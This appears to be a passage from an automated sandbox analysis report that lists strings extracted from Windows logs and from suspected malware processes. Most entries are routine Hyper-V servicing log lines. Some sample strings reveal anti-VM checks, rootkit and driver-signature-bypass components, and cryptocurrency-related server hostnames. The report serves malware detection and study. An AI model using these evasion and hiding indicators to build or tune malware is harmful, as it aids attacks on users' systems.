        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7a9c36033f0c22829893bc1c0a5e07a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: fc0d60ecae9730160d4af9bb0ca3213e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1505902669a359dad80a977529ca66cd, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c2f20508edf3c1fbda6e99ff59eb02d8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: l}main.isRunningInsideVMWare
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, new state: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 976eb15fe43109e4df4c51c7509e8caf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
        Source: csrss.exeBinary or memory string: ridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWin
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe.0.drBinary or memory string: VMSrvc
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Installed, pending: Default, start: Installed, applicable: Installed, targeted: Installed, limit: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 0b74307a9b8d5a99fef4ac35da0bd75f, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsmb start: %wsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 3e4a15565a769f217408d9c4b1007394, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b because it is already in the correct state.
        Source: 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmpBinary or memory string: vmnet/http.(*http2clientConnPool).addConnLocked
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c299ced9de977b3f430798798b7f4515, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 459e5e70c44eb8fcb9d7b4b143aad831, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0 because it is already in the correct state.
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2 because it is already in the correct state.
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Services, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
        Source: csrss.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current State: Default, new state: Off, RemovePayload: 0
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 80db53a4564878a8cdff9a7ca652d3fe, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
        Source: csrss.exeBinary or memory string: emoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Val
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8812e937fcebe77983df86ffdfe7a471, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detectParent (exact match): Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, parent state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
        Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpBinary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
        Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmp, upd.exe, 00000008.00000002.350773419.0000000000EC7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 908ea1a77ea441bcdf0a5b3d829d1614, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6739fa9f684abbea4b2e76cf14a0a1f4, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
        Source: CBS.log.7.drBinary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 23bad0369164ebf4f04ee41a74386028, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
        Source: csrss.exeBinary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
